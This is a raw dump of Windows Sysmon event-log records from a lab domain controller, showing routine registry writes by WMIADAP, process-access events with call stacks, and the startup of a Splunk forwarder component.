13:37:58.954{59A5CD1D-8E46-6005-1600-00000000A301}15442100C:\Windows\system32\svchost.exe{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\wbem\wmisvc.dll+2624|c:\windows\system32\wbem\wmisvc.dll+2491|C:\Windows\SYSTEM32\ntdll.dll+7d87d|C:\Windows\SYSTEM32\ntdll.dll+3a979|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000004437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:37:58.641{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ed9f-0x2261b5e6) 12241200x80000000000000004468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 13241300x80000000000000004467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List25560 25566 25576 25586 25606 25650 25660 25698 25704 
25720 13241300x80000000000000004466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First HelpDWORD (0x000063d9) 13241300x80000000000000004465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First CounterDWORD (0x000063d8) 13241300x80000000000000004464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last HelpDWORD (0x0000647f) 13241300x80000000000000004463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last CounterDWORD (0x0000647e) 13241300x80000000000000004462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x0000647f) 13241300x80000000000000004461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.095{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x0000647e) 
13241300x80000000000000004460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 13241300x80000000000000004459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\PerfIniFileWmiApRpl.ini 12241200x80000000000000004458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 12241200x80000000000000004457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List 12241200x80000000000000004456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last Help 12241200x80000000000000004455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First Help 
12241200x80000000000000004454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last Counter 12241200x80000000000000004453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First Counter 13241300x80000000000000004452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x000063d7) 13241300x80000000000000004451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.017{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x000063d6) 13241300x80000000000000004450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:09.001{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 13241300x80000000000000004481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001) 
13241300x80000000000000004480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000) 13241300x80000000000000004479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\xeniface.sys[XENIFACEMOF]LowDateTime:1504655616,HighDateTime:30789954***Binary mof compiled successfully 13241300x80000000000000004478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\intelppm.sys.mui[PROCESSORWMI]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000004477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\intelppm.sys[PROCESSORWMI]LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully 13241300x80000000000000004476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\mssmbios.sys.mui[MofResource]LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully 
13241300x80000000000000004475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\mssmbios.sys[MofResource]LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully 13241300x80000000000000004474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\ACPI.sys.mui[ACPIMOFResource]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000004473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\ACPI.sys[ACPIMOFResource]LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully 13241300x80000000000000004472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\en-US\kernelbase.dll.mui[MofResourceName]LowDateTime:1470350432,HighDateTime:30846383***Binary mof compiled successfully 13241300x80000000000000004471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 
13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\kernelbase.dll[MofResourceName]LowDateTime:-1965991328,HighDateTime:30841156***Binary mof compiled successfully 12241200x80000000000000004470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashDeleteKey2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE 13241300x80000000000000004469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-18 13:38:11.908{59A5CD1D-8F36-6005-F200-00000000A301}740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance DataBinary Data 10341000x80000000000000004483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:18.377{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:18.377{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F64-6005-F300-00000000A301}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:44.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F64-6005-F300-00000000A301}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F64-6005-F300-00000000A301}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:44.644{59A5CD1D-8F64-6005-F300-00000000A301}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program 